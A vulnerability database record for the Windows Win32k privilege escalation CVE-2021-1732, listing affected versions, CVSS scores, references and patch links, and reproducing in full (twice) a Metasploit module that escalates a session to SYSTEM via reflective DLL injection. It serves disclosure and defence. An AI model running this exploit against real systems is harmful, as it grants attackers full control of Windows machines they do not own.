var-202102-0786
Vulnerability from variot
Windows Win32k Elevation of Privilege Vulnerability. Microsoft Win32k是美国微软(Microsoft)公司的一个用于Windows多用户管理的系统文件. Microsoft Win32k 中存在安全特征问题漏洞。以下产品及版本受到影响:Windows 10 Version 1803 for 32-bit Systems,Windows 10 Version 1803 for x64-based Systems,Windows 10 Version 1803 for ARM64-based Systems,Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Windows 10 Version 1909 for 32-bit Systems,Windows 10 Version 1909 for x64-based Systems,Windows 10 Version 1909 for ARM64-based Systems,Windows Server, version 1909 (Server Core installation),Windows 10 Version 2004 for 32-bit Systems,Windows 10 Version 2004 for ARM64-based Systems,Windows 10 Version 2004 for x64-based Systems,Windows Server, version 2004 (Server Core installation),Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 20H2 for ARM64-based Systems,Windows Server, version 20H2 (Server Core Installation). ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking
include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Deprecated moved_from 'exploit/windows/local/cve_2021_1732_win32k'
def initialize(info = {}) super( update_info( info, { 'Name' => 'Win32k ConsoleControl Offset Confusion', 'Description' => %q{ A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation.
This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
function on a wider range of Windows 10 targets.
},
'License' => MSF_LICENSE,
'Author' => [
# CVE-2021-1732
'BITTER APT', # exploit as used in the wild
'JinQuan', # detailed analysis
'MaDongZe', # detailed analysis
'TuXiaoYi', # detailed analysis
'LiHao', # detailed analysis
# CVE-2022-21882
'L4ys', # github poc
# both CVEs
'KaLendsi', # github pocs
# Metasploit exploit
'Spencer McIntyre' # metasploit module
],
'Arch' => [ ARCH_X64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Targets' => [
[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]
],
'Payload' => {
'DisableNops' => true
},
'References' => [
# CVE-2021-1732 references
[ 'CVE', '2021-1732' ],
[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],
# CVE-2022-21882 references
[ 'CVE', '2022-21882' ],
[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],
[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]
],
'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_OS_RESTARTS, ],
'Reliability' => [ REPEATABLE_SESSION, ],
'SideEffects' => []
}
}
)
)
end
def check sysinfo_value = sysinfo['OS']
if sysinfo_value !~ /windows/i
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
vprint_status("Windows Build Number = #{build_num}")
unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)
print_error('The exploit only supports Windows 10 versions 1803 - 21H2')
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end
if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end
encoded_payload = payload.encoded
execute_dll(
::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),
[encoded_payload.length].pack('I<') + encoded_payload
)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end end
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-202102-0786", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "windows 10 1909", scope: "eq", trust: 1, vendor: "microsoft", version: null, }, { model: "windows 10 1809", scope: "eq", trust: 1, vendor: "microsoft", version: null, }, { model: "windows server 2019", scope: "eq", trust: 1, vendor: "microsoft", version: null, }, { model: "windows 10 1803", scope: "eq", trust: 1, vendor: "microsoft", version: null, }, { model: "windows server 2004", scope: "eq", trust: 1, vendor: "microsoft", version: null, }, { model: "windows 10 20h2", scope: "eq", trust: 1, vendor: "microsoft", version: null, }, { model: "windows server 20h2", scope: "eq", trust: 1, vendor: "microsoft", version: null, }, { model: "windows 10 2004", scope: "eq", trust: 1, vendor: "microsoft", version: null, }, { model: "windows server 1909", scope: "eq", trust: 1, vendor: "microsoft", version: null, }, ], sources: [ { db: "NVD", id: "CVE-2021-1732", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { children: [], cpe_match: [ { cpe23Uri: "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", cpe_name: [], vulnerable: true, }, { cpe23Uri: "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", cpe_name: [], vulnerable: true, }, { cpe23Uri: "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", cpe_name: [], vulnerable: true, }, { cpe23Uri: "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", cpe_name: [], vulnerable: true, }, { cpe23Uri: "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", cpe_name: [], vulnerable: true, }, { cpe23Uri: "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", cpe_name: [], vulnerable: true, }, { cpe23Uri: "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", cpe_name: [], vulnerable: true, }, { cpe23Uri: "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", cpe_name: [], vulnerable: true, }, { cpe23Uri: "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", cpe_name: [], vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "NVD", id: "CVE-2021-1732", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Spencer McIntyre", sources: [ { db: "CNNVD", id: "CNNVD-202102-670", }, ], trust: 0.6, }, cve: "CVE-2021-1732", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { acInsufInfo: false, accessComplexity: "LOW", accessVector: "LOCAL", authentication: "NONE", author: "NVD", availabilityImpact: "PARTIAL", baseScore: 4.6, confidentialityImpact: "PARTIAL", exploitabilityScore: 3.9, impactScore: 6.4, integrityImpact: "PARTIAL", obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, severity: "MEDIUM", trust: 1, userInteractionRequired: false, vectorString: "AV:L/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { acInsufInfo: null, accessComplexity: "LOW", accessVector: "LOCAL", authentication: "NONE", author: "VULMON", availabilityImpact: "PARTIAL", baseScore: 4.6, confidentialityImpact: "PARTIAL", exploitabilityScore: 3.9, id: "CVE-2021-1732", impactScore: 6.4, integrityImpact: "PARTIAL", obtainAllPrivilege: null, obtainOtherPrivilege: null, obtainUserPrivilege: null, severity: "MEDIUM", trust: 0.1, userInteractionRequired: null, vectorString: "AV:L/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "LOCAL", author: "NVD", availabilityImpact: "HIGH", baseScore: 7.8, baseSeverity: "HIGH", confidentialityImpact: "HIGH", exploitabilityScore: 1.8, impactScore: 5.9, integrityImpact: "HIGH", privilegesRequired: "LOW", scope: "UNCHANGED", trust: 2, userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, ], severity: [ { author: "NVD", id: "CVE-2021-1732", trust: 1, value: "HIGH", }, { author: "secure@microsoft.com", id: "CVE-2021-1732", trust: 1, value: "HIGH", }, { author: "CNNVD", id: "CNNVD-202102-670", trust: 0.6, value: "HIGH", }, { author: "VULMON", id: "CVE-2021-1732", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULMON", id: "CVE-2021-1732", }, { db: "CNNVD", id: "CNNVD-202102-670", }, { db: "NVD", id: "CVE-2021-1732", }, { db: "NVD", id: "CVE-2021-1732", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Windows Win32k Elevation of Privilege Vulnerability. Microsoft Win32k是美国微软(Microsoft)公司的一个用于Windows多用户管理的系统文件. \nMicrosoft Win32k 中存在安全特征问题漏洞。以下产品及版本受到影响:Windows 10 Version 1803 for 32-bit Systems,Windows 10 Version 1803 for x64-based Systems,Windows 10 Version 1803 for ARM64-based Systems,Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Windows 10 Version 1909 for 32-bit Systems,Windows 10 Version 1909 for x64-based Systems,Windows 10 Version 1909 for ARM64-based Systems,Windows Server, version 1909 (Server Core installation),Windows 10 Version 2004 for 32-bit Systems,Windows 10 Version 2004 for ARM64-based Systems,Windows 10 Version 2004 for x64-based Systems,Windows Server, version 2004 (Server Core installation),Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 20H2 for ARM64-based Systems,Windows Server, version 20H2 (Server Core Installation). ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::Deprecated\n moved_from 'exploit/windows/local/cve_2021_1732_win32k'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'Win32k ConsoleControl Offset Confusion',\n 'Description' => %q{\n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation. \n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. \n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets. \n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n # CVE-2021-1732\n 'BITTER APT', # exploit as used in the wild\n 'JinQuan', # detailed analysis\n 'MaDongZe', # detailed analysis\n 'TuXiaoYi', # detailed analysis\n 'LiHao', # detailed analysis\n # CVE-2022-21882\n 'L4ys', # github poc\n # both CVEs\n 'KaLendsi', # github pocs\n # Metasploit exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'References' => [\n # CVE-2021-1732 references\n [ 'CVE', '2021-1732' ],\n [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],\n [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],\n [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],\n # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit\n [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],\n [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],\n [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],\n [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],\n # CVE-2022-21882 references\n [ 'CVE', '2022-21882' ],\n [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]\n ],\n 'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'SideEffects' => []\n }\n }\n )\n )\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected. \n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n\n unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)\n print_error('The exploit only supports Windows 10 versions 1803 - 21H2')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", sources: [ { db: "NVD", id: "CVE-2021-1732", }, { db: "CNNVD", id: "CNNVD-202102-670", }, { db: "VULMON", id: "CVE-2021-1732", }, { db: "PACKETSTORM", id: "166169", }, ], trust: 1.62, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2021-1732", trust: 1.8, }, { db: "PACKETSTORM", id: "166169", trust: 1.7, }, { db: "PACKETSTORM", id: "161880", trust: 1.6, }, { db: "PACKETSTORM", id: "162982", trust: 0.6, }, { db: "CXSECURITY", id: "WLB-2021030124", trust: 0.6, }, { db: "CNNVD", id: "CNNVD-202102-670", trust: 0.6, }, { db: "VULMON", id: "CVE-2021-1732", trust: 0.1, }, ], sources: [ { db: "VULMON", id: "CVE-2021-1732", }, { db: "PACKETSTORM", id: "166169", }, { db: "CNNVD", id: "CNNVD-202102-670", }, { db: "NVD", id: "CVE-2021-1732", }, ], }, id: "VAR-202102-0786", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VARIoT devices database", id: null, }, ], trust: 1, }, last_update_date: "2024-07-26T22:57:29.884000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Microsoft Windows Win32k Fixing measures for security feature vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=142782", }, { title: "Windows Privilege Escalation\nScreenshots:", trust: 0.1, url: "https://github.com/exploitblizzard/windows-privilege-escalation-cve-2021-1732 ", }, { title: "Windows Privilege Escalation", trust: 0.1, url: "https://github.com/asepsaepdin/cve-2021-1732 ", }, { title: "CVE-2021-1732", trust: 0.1, url: "https://github.com/beneficialcode/cve-2021-1732 ", }, ], sources: [ { db: "VULMON", id: "CVE-2021-1732", }, { db: "CNNVD", id: "CNNVD-202102-670", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-787", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2021-1732", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.2, url: "http://packetstormsecurity.com/files/161880/win32k-consolecontrol-offset-confusion.html", }, { trust: 2.2, url: "http://packetstormsecurity.com/files/166169/win32k-consolecontrol-offset-confusion-privilege-escalation.html", }, { trust: 1.6, url: "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2021-1732", }, { trust: 0.7, url: "https://nvd.nist.gov/vuln/detail/cve-2021-1732", }, { trust: 0.6, url: "https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-1732", }, { trust: 0.6, url: "https://cxsecurity.com/issue/wlb-2021030124", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/162982/windows-win32k-elevation-of-privilege-vulnerability.html", }, { trust: 0.6, url: "https://vigilance.fr/vulnerability/microsoft-windows-vulnerabilities-of-february-2021-34535", }, { trust: 0.1, url: "https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e'", }, { trust: 0.1, url: "https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-1732'", }, { trust: 0.1, url: "https://www.fuzzysecurity.com/tutorials/expdev/22.html'", }, { trust: 0.1, url: "https://github.com/rapid7/metasploit-framework", }, { trust: 0.1, url: "https://github.com/l4ys/cve-2022-21882'", }, { trust: 0.1, url: "https://github.com/kalendsi/cve-2022-21882'", }, { trust: 0.1, url: "https://metasploit.com/download", }, { trust: 0.1, url: "https://github.com/kalendsi/cve-2021-1732-exploit'", }, { trust: 0.1, url: "https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html'", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2022-21882", }, { trust: 0.1, url: "https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm'", }, { trust: 0.1, url: "https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/'", }, { trust: 0.1, url: "https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html'", }, ], sources: [ { db: "PACKETSTORM", id: "166169", }, { db: "CNNVD", id: "CNNVD-202102-670", }, { db: "NVD", id: "CVE-2021-1732", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULMON", id: "CVE-2021-1732", }, { db: "PACKETSTORM", id: "166169", }, { db: "CNNVD", id: "CNNVD-202102-670", }, { db: "NVD", id: "CVE-2021-1732", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2021-02-25T00:00:00", db: "VULMON", id: "CVE-2021-1732", }, { date: "2022-02-28T16:49:05", db: "PACKETSTORM", id: "166169", }, { date: "2021-02-09T00:00:00", db: "CNNVD", id: "CNNVD-202102-670", }, { date: "2021-02-25T23:15:13.930000", db: "NVD", id: "CVE-2021-1732", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2023-12-29T00:00:00", db: "VULMON", id: "CVE-2021-1732", }, { date: "2022-03-03T00:00:00", db: "CNNVD", id: "CNNVD-202102-670", }, { date: "2024-07-25T17:53:12.640000", db: "NVD", id: "CVE-2021-1732", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "local", sources: [ { db: "CNNVD", id: "CNNVD-202102-670", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Microsoft Win32k Security feature vulnerability", sources: [ { db: "CNNVD", id: "CNNVD-202102-670", }, ], trust: 0.6, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "security feature problem", sources: [ { db: "CNNVD", id: "CNNVD-202102-670", }, ], trust: 0.6, }, }
Log in or create an account to share your comment.
Security Advisory comment format.
This schema specifies the format of a comment related to a security advisory.
Title of the comment
Description of the comment
Loading…
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.